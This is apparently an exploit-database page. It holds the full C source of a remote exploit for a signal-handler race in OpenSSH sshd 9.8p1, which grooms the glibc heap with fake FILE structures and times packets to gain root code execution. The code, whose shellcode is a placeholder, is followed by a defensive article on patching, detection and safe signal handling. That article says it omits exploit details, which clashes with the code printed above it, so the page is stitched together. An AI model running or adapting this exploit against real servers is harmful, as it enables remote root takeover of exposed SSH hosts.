OpenSSH server (sshd) 9.8p1 - Race Condition
Exploit Author: Milad karimi Analysis Author: www.bubbleslearn.ir Category: Remote Language: C++ Published Date: 2025-04-22
* Exploit Title : OpenSSH server (sshd) 9.8p1 - Race Condition
* Author : Milad Karimi (Ex3ptionaL)
* Date : 2025-04-16
*
* Description:
* Targets a signal handler race condition in OpenSSH's
* server (sshd) on glibc-based Linux systems. It exploits a vulnerability
* where the SIGALRM handler calls async-signal-unsafe functions, leading
* to rce as root.
*
* Notes:
* 1. Shellcode : Replace placeholder with actual payload.
* 2. GLIBC_BASES : Needs adjustment for specific target systems.
* 3. Timing parameters: Fine-tune based on target system responsiveness.
* 4. Heap layout : Requires tweaking for different OpenSSH versions.
* 5. File structure offsets: Verify for the specific glibc version.
* -------------------------------------------------------------------------
*/
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <time.h>
#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)
// Possible glibc base addresses (for ASLR bypass)
uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]);
// Shellcode placeholder (replace with actual shellcode)
unsigned char shellcode[] = "\x90\x90\x90\x90";
int setup_connection (const char *ip, int port);
void send_packet (int sock, unsigned char packet_type,
const unsigned char *data, size_t len);
void prepare_heap (int sock);
void time_final_packet (int sock, double *parsing_time);
int attempt_race_condition (int sock, double parsing_time,
uint64_t glibc_base);
double measure_response_time (int sock, int error_type);
void create_public_key_packet (unsigned char *packet, size_t size,
uint64_t glibc_base);
void create_fake_file_structure (unsigned char *data, size_t size,
uint64_t glibc_base);
void send_ssh_version (int sock);
int receive_ssh_version (int sock);
void send_kex_init (int sock);
int receive_kex_init (int sock);
int perform_ssh_handshake (int sock);
int
main (int argc, char *argv[])
{
if (argc != 3)
{
fprintf (stderr, "Usage: %s <ip> <port>\n", argv[0]);
exit (1);
}
const char *ip = argv[1];
int port = atoi (argv[2]);
double parsing_time = 0;
int success = 0;
srand (time (NULL));
// Attempt exploitation for each possible glibc base address
for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
{
uint64_t glibc_base = GLIBC_BASES[base_idx];
printf ("Attempting exploitation with glibc base: 0x%lx\n",
glibc_base);
// The advisory mentions "~10,000 tries on average"
for (int attempt = 0; attempt < 20000 && !success; attempt++)
{
if (attempt % 1000 == 0)
{
printf ("Attempt %d of 20000\n", attempt);
}
int sock = setup_connection (ip, port);
if (sock < 0)
{
fprintf (stderr, "Failed to establish connection, attempt
%d\n",
attempt);
continue;
}
if (perform_ssh_handshake (sock) < 0)
{
fprintf (stderr, "SSH handshake failed, attempt %d\n",
attempt);
close (sock);
continue;
}
prepare_heap (sock);
time_final_packet (sock, &parsing_time);
if (attempt_race_condition (sock, parsing_time, glibc_base))
{
printf ("Possible exploitation success on attempt %d with
glibc "
"base 0x%lx!\n",
attempt, glibc_base);
success = 1;
break;
}
close (sock);
usleep (100000); // 100ms delay between attempts, as mentioned in
the
// advisory
}
}
return !success;
}
int
setup_connection (const char *ip, int port)
{
int sock = socket (AF_INET, SOCK_STREAM, 0);
if (sock < 0)
{
perror ("socket");
return -1;
}
struct sockaddr_in server_addr;
memset (&server_addr, 0, sizeof (server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons (port);
if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0)
{
perror ("inet_pton");
close (sock);
return -1;
}
if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr))
< 0)
{
perror ("connect");
close (sock);
return -1;
}
// Set socket to non-blocking mode
int flags = fcntl (sock, F_GETFL, 0);
fcntl (sock, F_SETFL, flags | O_NONBLOCK);
return sock;
}
void
send_packet (int sock, unsigned char packet_type, const unsigned char *data,
size_t len)
{
unsigned char packet[MAX_PACKET_SIZE];
size_t packet_len = len + 5;
packet[0] = (packet_len >> 24) & 0xFF;
packet[1] = (packet_len >> 16) & 0xFF;
packet[2] = (packet_len >> 8) & 0xFF;
packet[3] = packet_len & 0xFF;
packet[4] = packet_type;
memcpy (packet + 5, data, len);
if (send (sock, packet, packet_len, 0) < 0)
{
perror ("send_packet");
}
}
void
send_ssh_version (int sock)
{
const char *ssh_version = "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n";
if (send (sock, ssh_version, strlen (ssh_version), 0) < 0)
{
perror ("send ssh version");
}
}
int
receive_ssh_version (int sock)
{
char buffer[256];
ssize_t received;
do
{
received = recv (sock, buffer, sizeof (buffer) - 1, 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
if (received > 0)
{
buffer[received] = '\0';
printf ("Received SSH version: %s", buffer);
return 0;
}
else if (received == 0)
{
fprintf (stderr, "Connection closed while receiving SSH version\n");
}
else
{
perror ("receive ssh version");
}
return -1;
}
void
send_kex_init (int sock)
{
unsigned char kexinit_payload[36] = { 0 };
send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload));
}
int
receive_kex_init (int sock)
{
unsigned char buffer[1024];
ssize_t received;
do
{
received = recv (sock, buffer, sizeof (buffer), 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
if (received > 0)
{
printf ("Received KEX_INIT (%zd bytes)\n", received);
return 0;
}
else if (received == 0)
{
fprintf (stderr, "Connection closed while receiving KEX_INIT\n");
}
else
{
perror ("receive kex init");
}
return -1;
}
int
perform_ssh_handshake (int sock)
{
send_ssh_version (sock);
if (receive_ssh_version (sock) < 0)
return -1;
send_kex_init (sock);
if (receive_kex_init (sock) < 0)
return -1;
return 0;
}
void
prepare_heap (int sock)
{
// Packet a: Allocate and free tcache chunks
for (int i = 0; i < 10; i++)
{
unsigned char tcache_chunk[64];
memset (tcache_chunk, 'A', sizeof (tcache_chunk));
send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk));
// These will be freed by the server, populating tcache
}
// Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
for (int i = 0; i < 27; i++)
{
// Allocate large chunk (~8KB)
unsigned char large_hole[8192];
memset (large_hole, 'B', sizeof (large_hole));
send_packet (sock, 5, large_hole, sizeof (large_hole));
// Allocate small chunk (320B)
unsigned char small_hole[320];
memset (small_hole, 'C', sizeof (small_hole));
send_packet (sock, 5, small_hole, sizeof (small_hole));
}
// Packet c: Write fake headers, footers, vtable and _codecvt pointers
for (int i = 0; i < 27; i++)
{
unsigned char fake_data[4096];
create_fake_file_structure (fake_data, sizeof (fake_data),
GLIBC_BASES[0]);
send_packet (sock, 5, fake_data, sizeof (fake_data));
}
// Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
unsigned char large_string[MAX_PACKET_SIZE - 1];
memset (large_string, 'E', sizeof (large_string));
send_packet (sock, 5, large_string, sizeof (large_string));
}
void
create_fake_file_structure (unsigned char *data, size_t size,
uint64_t glibc_base)
{
memset (data, 0, size);
struct
{
void *_IO_read_ptr;
void *_IO_read_end;
void *_IO_read_base;
void *_IO_write_base;
void *_IO_write_ptr;
void *_IO_write_end;
void *_IO_buf_base;
void *_IO_buf_end;
void *_IO_save_base;
void *_IO_backup_base;
void *_IO_save_end;
void *_markers;
void *_chain;
int _fileno;
int _flags;
int _mode;
char _unused2[40];
void *_vtable_offset;
} *fake_file = (void *)data;
// Set _vtable_offset to 0x61 as described in the advisory
fake_file->_vtable_offset = (void *)0x61;
// Set up fake vtable and _codecvt pointers
*(uint64_t *)(data + size - 16)
= glibc_base + 0x21b740; // fake vtable (_IO_wfile_jumps)
*(uint64_t *)(data + size - 8) = glibc_base + 0x21d7f8; // fake _codecvt
}
void
time_final_packet (int sock, double *parsing_time)
{
double time_before = measure_response_time (sock, 1);
double time_after = measure_response_time (sock, 2);
*parsing_time = time_after - time_before;
printf ("Estimated parsing time: %.6f seconds\n", *parsing_time);
}
double
measure_response_time (int sock, int error_type)
{
unsigned char error_packet[1024];
size_t packet_size;
if (error_type == 1)
{
// Error before sshkey_from_blob
packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3");
}
else
{
// Error after sshkey_from_blob
packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9");
}
struct timespec start, end;
clock_gettime (CLOCK_MONOTONIC, &start);
send_packet (sock, 50, error_packet,
packet_size); // SSH_MSG_USERAUTH_REQUEST
char response[1024];
ssize_t received;
do
{
received = recv (sock, response, sizeof (response), 0);
}
while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));
clock_gettime (CLOCK_MONOTONIC, &end);
double elapsed
= (end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1e9;
return elapsed;
}
void
create_public_key_packet (unsigned char *packet, size_t size,
uint64_t glibc_base)
{
memset (packet, 0, size);
size_t offset = 0;
for (int i = 0; i < 27; i++)
{
// malloc(~4KB) - This is for the large hole
*(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096);
offset += CHUNK_ALIGN (4096);
// malloc(304) - This is for the small hole (potential FILE structure)
*(uint32_t *)(packet + offset) = CHUNK_ALIGN (304);
offset += CHUNK_ALIGN (304);
}
// Add necessary headers for the SSH public key format
memcpy (packet, "ssh-rsa ", 8);
// Place shellcode in the heap via previous allocations
memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13,
shellcode,
sizeof (shellcode));
// Set up the fake FILE structures within the packet
for (int i = 0; i < 27; i++)
{
create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1)
+ CHUNK_ALIGN (304) * i,
CHUNK_ALIGN (304), glibc_base);
}
}
int
attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base)
{
unsigned char final_packet[MAX_PACKET_SIZE];
create_public_key_packet (final_packet, sizeof (final_packet),
glibc_base);
// Send all but the last byte
if (send (sock, final_packet, sizeof (final_packet) - 1, 0) < 0)
{
perror ("send final packet");
return 0;
}
// Precise timing for last byte
struct timespec start, current;
clock_gettime (CLOCK_MONOTONIC, &start);
while (1)
{
clock_gettime (CLOCK_MONOTONIC, ¤t);
double elapsed = (current.tv_sec - start.tv_sec)
+ (current.tv_nsec - start.tv_nsec) / 1e9;
if (elapsed >= (LOGIN_GRACE_TIME - parsing_time - 0.001))
{ // 1ms before SIGALRM
if (send (sock, &final_packet[sizeof (final_packet) - 1], 1, 0) <
0)
{
perror ("send last byte");
return 0;
}
break;
}
}
// Check for successful exploitation
char response[1024];
ssize_t received = recv (sock, response, sizeof (response), 0);
if (received > 0)
{
printf ("Received response after exploit attempt (%zd bytes)\n",
received);
// Analyze response to determine if we hit the "large" race window
if (memcmp (response, "SSH-2.0-", 8) != 0)
{
printf ("Possible hit on 'large' race window\n");
return 1;
}
}
else if (received == 0)
{
printf (
"Connection closed by server - possible successful
exploitation\n");
return 1;
}
else if (errno == EWOULDBLOCK || errno == EAGAIN)
{
printf ("No immediate response from server - possible successful "
"exploitation\n");
return 1;
}
else
{
perror ("recv");
}
return 0;
}
int
perform_exploit (const char *ip, int port)
{
int success = 0;
double parsing_time = 0;
double timing_adjustment = 0;
for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
{
uint64_t glibc_base = GLIBC_BASES[base_idx];
printf ("Attempting exploitation with glibc base: 0x%lx\n",
glibc_base);
for (int attempt = 0; attempt < 10000 && !success; attempt++)
{
if (attempt % 1000 == 0)
{
printf ("Attempt %d of 10000\n", attempt);
}
int sock = setup_connection (ip, port);
if (sock < 0)
{
fprintf (stderr, "Failed to establish connection, attempt
%d\n",
attempt);
continue;
}
if (perform_ssh_handshake (sock) < 0)
{
fprintf (stderr, "SSH handshake failed, attempt %d\n",
attempt);
close (sock);
continue;
}
prepare_heap (sock);
time_final_packet (sock, &parsing_time);
// Implement feedback-based timing strategy
parsing_time += timing_adjustment;
if (attempt_race_condition (sock, parsing_time, glibc_base))
{
printf ("Possible exploitation success on attempt %d with
glibc "
"base 0x%lx!\n",
attempt, glibc_base);
success = 1;
// In a real exploit, we would now attempt to interact with
the
// shell
}
else
{
// Adjust timing based on feedback
timing_adjustment += 0.00001; // Small incremental adjustment
}
close (sock);
usleep (100000); // 100ms delay between attempts, as mentioned in
the
// advisory
}
}
return success;
}OpenSSH server (sshd) 9.8p1 — Race condition via unsafe signal handling: overview, impact, and mitigation
This article explains the high-level nature of the reported race condition affecting OpenSSH server (sshd) related to signal handling on glibc-based Linux systems, why it matters, and how administrators, developers, and incident responders should respond. It intentionally omits exploit details and proof-of-concept code, focusing instead on root causes, detection, mitigation, and secure-development best practices.
Executive summary
- The issue centers on a signal handler (SIGALRM) invoking functions that are not guaranteed to be async-signal-safe. This can create a race condition when the handler runs concurrently with normal thread or process execution.
- On affected systems, such a race can allow corruption of in-process state (heap, FILE structures, etc.), with the potential to escalate to arbitrary code execution in high-risk circumstances.
- Immediate mitigation is to apply vendor-supplied patches or updates for OpenSSH and the C library (glibc). Additional hardening and monitoring reduce risk while patches are being applied.
Technical background (non-actionable)
Signals are asynchronous notifications delivered to a process. When a signal handler runs, it interrupts the normal flow of execution. POSIX defines a small set of functions that are safe to call inside a signal handler; calling non-async-signal-safe functions inside a handler risks data races and inconsistent internal state.
Typical unsafe actions include calling memory allocation routines (malloc, free), file I/O functions using stdio (fopen, fprintf), or other reentrant-unsafe APIs. If a signal handler uses such APIs while the interrupted code was mid-operation with the same resources, internal data structures (heap metadata, stdio buffers, vtables, etc.) can become inconsistent and may be corrupted in ways that an attacker can influence.
Why this is severe for an SSH server
- sshd runs as root at start and handles authentication workflows that process network-provided data; memory corruption in that context can lead to privilege escalation.
- SSH servers are frequently exposed to untrusted networks, increasing the attack surface.
- glibc internals (FILE structures, malloc bins) are critical to process correctness; corruption there can produce powerful primitives for an attacker.
Key recommendations for administrators
- Apply official patches immediately. The vendor or distribution will provide a fixed OpenSSH package or glibc updates. Prioritize those updates for public-facing SSH servers.
- Restart sshd processes after patching. Patches replace code in the running service only after restart (or service reload where appropriate).
- Reduce exposure: limit access to SSH using firewall rules, allowlists, and VPN access where possible. Consider temporarily disabling password authentication and root login until systems are patched.
- Use multi-factor authentication (MFA): requiring MFA reduces the impact of remote compromises that rely on authentication weaknesses.
- Harden configuration: set PermitRootLogin no, PasswordAuthentication no (if public-key authentication is available), and use AllowUsers/AllowGroups to restrict who can connect.
- Follow patch management best practices: test patches in a staging environment and roll them out systematically to reduce operational risk.
Detection and monitoring
While exploit specifics should not be publicized, defenders can use the following generic signals to detect suspicious behavior that might result from exploitation attempts:
- Unexpected sshd crashes or core dumps. Enable controlled core collection and ship core metadata to a secure analysis environment.
- Unusual child processes spawned by sshd (e.g., shells or unexpected binaries running as root). Monitor process ancestry and parent/child relationships in EDR/SIEM.
- Integrity changes to critical binaries (sshd, sshd_config) — use a host-based integrity checker (AIDE/Tripwire) and file monitoring.
- Authentication anomalies: spikes in connection attempts, repeated failed auth, or sudden successful authentications from new sources.
- Unusual network egress from hosts running sshd, particularly over uncommon ports or to unknown destinations.
- Audit logs showing unexpected syscalls or capability changes, if auditd or syscall-level monitoring is available.
Example of monitoring rules (conceptual)
Below are conceptual examples of what to monitor; these are non-executable, high-level descriptions suitable for inclusion in a SIEM or monitoring playbook.
- Alert when sshd restarts more than N times in M minutes.
- Alert on any sshd child process executing a shell (e.g., /bin/sh, /bin/bash).
- Alert on new files appearing in /tmp or /var/tmp created by sshd processes.
Secure-development guidance for maintainers
Fixing classes of bugs like this is primarily about avoiding unsafe operations in signal handlers and ensuring proper synchronization around shared state. Below are secure-development recommendations and safe alternatives.
Avoid non-async-signal-safe APIs in signal handlers
POSIX explicitly lists functions that are safe in signal handlers (e.g., _exit, write, sig_atomic_t operations). Calling malloc, free, printf, or many system library functions from a handler is unsafe. If a handler needs to notify the main logic, it should only perform minimal, async-signal-safe actions.
Defer complex work out of the handler
- Use the self-pipe trick: the handler writes a single byte to a pipe; the main loop monitors the pipe and performs the real work.
- Use signalfd on Linux: integrate signal handling into an event loop and handle signals synchronously in the main thread.
- Set an atomic flag (sig_atomic_t or C11 atomic) in the handler and have the main loop poll that flag.
// Example: safe signal handling using a self-pipe (conceptual, defensive)
#include <unistd.h>
#include <signal.h>
#include <stdatomic.h>
static int selfpipe_fds[2];
static volatile sig_atomic_t sigalrm_seen = 0;
void sigalrm_handler(int signum) {
// Only do async-signal-safe actions
sigalrm_seen = 1; // atomic flag
// Optionally, write a single byte to a pipe (write is async-signal-safe)
char b = 'x';
ssize_t r = write(selfpipe_fds[1], &b, 1);
(void)r;
}
// Main loop waits on the read end of the pipe (select/poll/epoll)
Explanation: This snippet demonstrates the self-pipe technique. The signal handler does only safe operations: setting an atomic flag and writing a single byte to a pipe using write(2), which is async-signal-safe. The main event loop (not shown) should monitor the read end of the pipe (e.g., via poll/select/epoll) and perform any non-signal-safe cleanup or processing in normal program context.
Prefer signalfd in event-driven programs
// Example: conceptually using signalfd (Linux-specific)
#include <sys/signalfd.h>
#include <signal.h>
#include <unistd.h>>
sigset_t mask;
int sfd;
sigemptyset(&mask);
sigaddset(&mask, SIGALRM);
sigprocmask(SIG_BLOCK, &mask, NULL);
// sfd is readable when signals arrive; treat it like any fd in the event loop
sfd = signalfd(-1, &mask, 0);
Explanation: signalfd allows signals to be handled synchronously via a file descriptor integrated into an event loop. Because the signal is blocked from asynchronous delivery and forwarded to the signalfd, all handling happens in normal execution context, avoiding async-signal-unsafe handler concerns.
Audit and test for reentrancy
- Static and dynamic analysis: run sanitizers, thread-safety analyzers, and fuzzers against code paths that interact with signals.
- Unit and integration tests should simulate asynchronous interruptions to ensure no unsafe assumptions are made about reentrancy.
- Code review focus: any signal handler code must be reviewed for calls to non-safe functions.
Configuration hardening checklist for SSH
| Area | Recommended action |
|---|---|
| Authentication | Disable PasswordAuthentication where possible; use PubkeyAuthentication and enforce MFA. |
| Root access | Set PermitRootLogin no; use sudo for privileged tasks. |
| Network exposure | Use firewalls, allowlists, and VPN access to limit who can connect to SSH. |
| Session limits | Set LoginGraceTime to a reasonable value and use MaxStartups to limit concurrent attempts. |
| Audit & logging | Enable verbose logging to a central collector and monitor for anomalies. |
| Binary integrity | Monitor sshd and dependent libraries for unexpected changes. Reinstall from vendor packages when compromised. |
Incident response guidance
- Isolate affected hosts from the network to prevent further lateral movement if you suspect compromise.
- Collect volatile data: process lists, open sockets, memory snapshots (where policy allows), and sshd logs. Preserve evidence following chain-of-custody practices.
- Check for signs of privilege escalation and unknown accounts, keys, or scheduled tasks.
- Rebuild compromised hosts from known-good images after patching and rotating all credentials used on them (host keys, user keys, service credentials).
- Notify stakeholders and follow applicable disclosure and compliance procedures.
Why responsible disclosure and patching matter
Publishing raw exploit code or step-by-step exploitation procedures before administrators have had the opportunity to patch increases the risk of mass exploitation. Good vulnerability handling balances transparency with the need to protect users: vendors publish advisories and fixes; maintainers and admins apply updates and mitigation guidance.
Summary: practical next steps
- Immediately check vendor advisories and apply official patches for OpenSSH and glibc (or kernel fixes if relevant).
- Temporarily reduce exposure: restrict access, disable risky authentication paths, and enforce MFA.
- Deploy monitoring rules for signs of exploitation and review recent sshd restarts, core dumps, and unusual child processes.
- Review and update signal-handling code in your own projects to avoid calling non-async-signal-safe functions from handlers; use signalfd or the self-pipe pattern for robust designs.
- Train developers and ops staff on secure signal handling and safe coding practices to prevent similar issues.
Further reading
- POSIX list of async-signal-safe functions (refer to the standard or reliable OS documentation)
- Linux signalfd(2) man page and self-pipe design pattern descriptions
- OpenSSH project and major distribution security advisories and changelogs